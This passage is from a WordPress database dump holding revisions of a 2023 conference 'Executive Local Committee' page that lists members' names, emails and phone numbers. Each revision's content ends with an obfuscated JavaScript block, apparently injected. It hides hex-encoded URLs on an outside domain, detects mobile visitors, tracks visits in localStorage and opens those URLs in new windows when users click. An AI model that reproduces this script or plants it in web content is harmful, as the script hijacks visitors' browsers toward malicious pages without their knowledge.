_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:30:45','2023-06-27 10:30:45','',4849,'https://gsw2023.com/?p=4903',0,'revision','',0),
(4904,4,'2023-06-27 10:32:16','2023-06-27 10:32:16','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687861835833{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687861930301{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:32:16','2023-06-27 10:32:16','',4849,'https://gsw2023.com/?p=4904',0,'revision','',0),
(4905,4,'2023-06-27 10:34:32','2023-06-27 10:34:32','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687861025115{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>IT Support</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687861806903{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Local Web director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span>\r\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687862064787{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\"][vc_column_text css=\".vc_custom_1687861930301{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime 